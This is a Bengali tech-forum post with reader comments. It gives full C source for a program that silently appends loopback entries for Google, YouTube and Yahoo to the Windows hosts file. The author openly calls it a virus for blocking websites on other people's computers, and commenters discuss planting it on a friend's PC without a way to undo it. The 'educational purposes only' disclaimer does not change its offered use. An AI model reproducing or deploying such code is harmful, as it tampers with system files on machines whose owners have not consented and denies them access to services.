এবার বন্ধ করুন যেকোন ওয়েবসাইট

অপ্রয়োজনীয় ও ক্ষতিকর ওয়েবপেজ গুলো বন্ধ করুন নিমিষে । আপনি চাইলে যে কারো ওয়েবসাইটও বন্ধ করে দিতে পারেন । সে তার কম্পিউটার থেকে আর সেই পেজগুলো ব্যবহার করতে পারবে না ।
সেক্ষেত্রে এটা ভাইরাস হিসেবেও ব্যবহার করতে পারেন ।

firefox-blocked

এখান থেকে সি ডাউনলোড করুন

এবং সেটাপ দিতে ডাবল ক্লিক করার পর Unzip এ ক্লিক করুন । ব্যস কম্পিলিট ।
এরপর C ড্রাইভের ভিতরে গিয়ে TC তারপর BIN এ যান । সর্বশেষে TC তে ক্লিক করে C ওপেন করুন এবং কোডগুলো টাইপ করুন । উপরের মেন্যুতে গিয়ে Save as এ ক্লিক করে ফাইলের নাম Block_site.C লিখুন ।

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

সেভ করার পর কম্পাইল করার জন্য Alt-F9 প্রেস করুন । কম্পাইল হয়ে গেলে F9 প্রেস করুন EXE ফাইলকে জেনারেট করার জন্য । আর ইরর দেখালে কোডটি ভালভাবে চেক করুন।

তবে সাবধান CTRL-F9 প্রেস করবেন না । তাহলে ফাইলটি আপনার পিসিতেই রান হয়ে যাবে ।

পুনরায় কম্পাইল করুন এবং EXE ফাইলটি জেনারেট করুন । ব্যস তৈরী হয়ে Block_site এপ্লিকেশন ।
টেষ্ট করুনঃ

আপনার পিসিতে EXE ফাইলটিতে ক্লিক করে টেষ্ট করে দেখতে পারেন । সেক্ষেত্রে

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”

};

এখানে যে সাইটগুলোর নাম দেয়া আছে সেগুলো ব্লগ হয়ে যাবে । সি জানা থাকলে মডিফাই করতে পারবেন অনায়াসে আর উপভোগ করুন দারুনভাবে ।

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

কমেন্ট বাধ্যতামূলক ।

আমার ছোট্ট ব্লগ দেখতে ক্লিক করুন

প্রোগ্রামিং শেখার জন্য ২টি বইয়ের নাম আপনাদের জানিয়ে দিচ্ছি । আগ্রহী হলে বই ২টি নীলক্ষেতের ফেরেন্ডস বুক ওয়াল্ড এ পেতে পারেন ।

১. Programing in ANSI C by E BALAGURUSAMY
২. JAVA Software Solutions by JOHN LEWIS & WILLIAM LOFTUS

Level 0

আমি Mahfuzar Rahman। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 14 বছর 11 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 31 টি টিউন ও 254 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

I am moving ....


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

ভাইয়া কাজ করলে +++++++++ দেওয়া হবে।
না হলে – – – – – – – – – – – – –

    দেখি কপালে কি আছে +++++++++ না – – – – – – – – – – .
    সবাই একটু দোয়া কইরেন যেন +++++++++ পাই ।

ভাই আনব্লক করার কোডটাও দিতেন।টেস্ট করার পর আনব্লক করব কিভাবে।

    বাকের ভাই এটা সধারনত ওয়েব পেজ ব্লগ করার একটা ভাইরাস.
    নিজের পিসিতে ওয়েব সাইট ব্লগ করতে হলে ম্যানুয়ালী করুন ।
    আপনার ব্রাউজারের অপশন থেকে চেন্জ করুন । তাহলে নিজেই নিয়ন্ত্রন করতে পারবেন ।

    বুঝি নাই, আমি আমার বন্ধুর পিসিতে যদি এটা লাগাই, তাহলে ব্লক করব কিভাবে? ব্লক করার জন্য কোন প্রোগ্রাম নাই?

    বুঝি নাই, আমি আমার বন্ধুর পিসিতে যদি এটা লাগাই, তাহলে un- ব্লক করব কিভাবে? un-ব্লক করার জন্য কোন প্রোগ্রাম নাই? নাকি ভাইরাস scan করলেই হবে?

    এই প্রোগ্রাম থেকে যে EXE ফাইলটা তৈরী হবে সেটাতে ক্লিক করলে Google,yahoo,youtube এই ৩টি সাইট বন্ধ হয়ে যাবে । সাইটগুলো চেন্জ করতে প্রোগ্রামে সাইটের নাম চেন্জ করে দিন ।

    স্বাধীন ভাই, ভাইরাস সাধারনত আন-ইন্সটল করা যায় না ।
    শক্তিশালী এন্টিভাইরাস হলে এমনিতেই ভাইরাস ডিলিট হয়ে যাবে ।
    তবে যদি আন-ইন্সটল করার ইচ্ছা আগে থেকেই থাকে তাহলে ম্যানুয়ালী ওয়েব সাইট ব্লগ করাই ভাল ।

    বাকের ভাই C:\WINDOWS\system32\drivers\etc তে যান।গিয়ে hosts ফাইলটা Notepad দিয়ে open করুন।127.0.0.1 লিখে একটা TAB দিয়ে যে সাইট block করতে চান তা লিখুন।এভাবে যতগুলো সাইট block করতে চান তা 127.0.0.1 লিখে TAB দিয়ে টাইপ করুন।অতঃপর save করুন।একলা পথিক ভাই এর virus টা এইখানেই change তা করবে।
    ফলে আপনি এখানে গিয়ে এডিট করুন।ধন্যবাদ।

আপনের সি এর সফটওয়্যার এর TC তে ক্লিক দিলে মনিটর এর পুরা জায়গা দখল করে কেন? এটাকে Restore down করা যায় না? মানে পুরা জায়গা দখল না করে অর্ধেক জায়গা দখল করতে পারে না?

vai আপনি আগে যে ভাইরাস কোড দিয়েছেন সেগুলো কি অন্য কোনো নামে সেভ করা যায় যেমন আপনি লিখেছেন যে manila virus save করতে হলে manila.vbs নামে সেভ করতে হবে। আমি যদি অন্য কোনো নামে সেভ করে .vbs দেই তাহলে কি কোনো সমস্যা আছে।

    আপনি যে কোন নামেই সেভ করতে পারেন । শুধু ফরম্যাট টা ঠিক থাকলেই হলো ।

    “নামে কী বা আসে যায়”…আকিব ভাই মনে রাখবেন এই কথাটা সব ক্ষেত্রে প্রযোজ্য

    ঠিক তাই, বৃক্ষ তোমার নাম কি, ফলে পরিচয় ।

দারুন জিনিস ভাই। ধন্যবাদ আপনাকে এটা শেয়ার করার জন্য।
আপনার ছোট সাইটা দেখতে চেয়েছিলাম কিন্তু চাকা শুধু ঘুরছে।
আমার ধারে কাছে কারো নেট নেই, টেস্ট করবো কি নিজের পিসিতে। তাহলে পরে ঠিক করা যাবে তো।

    ধন্যবাদ সাইদ ভাই, নিজস্ব পিসিতে টেষ্ট না করাই ভালো ।

একলা পথিক ভাই খুবই ভাল হয়েছে।

জোস !!!!!!!!!!!! কি বলব আসলে মনে করতে পাচ্বছিনা তবে সামনে কাজে আসবে।।।।।।।।।।।।।।।।।।

ভাই।। আমার পিসিতে সাচর্ দিলে (search Companion) দৈখাচ্ছে কেন???????????????

    সার্চ দিলে কি দেখাচ্ছে সেটা বুঝতে পারলাম না ।

Level 3

#include

using namespace std;

int main(){
cout>> “carry on :)”;
return 0;
}

Loop ta chalia Jan.

Level 0

Brother u r my favorite tuner,I always like ur all tune.Keep it up………..

Level 0

ধন্যবাদ, আচ্ছা আপনি শুধু ভাইরাস নিয়ে আছেন কেন? 🙂 🙂 🙂

ধন্যবাদ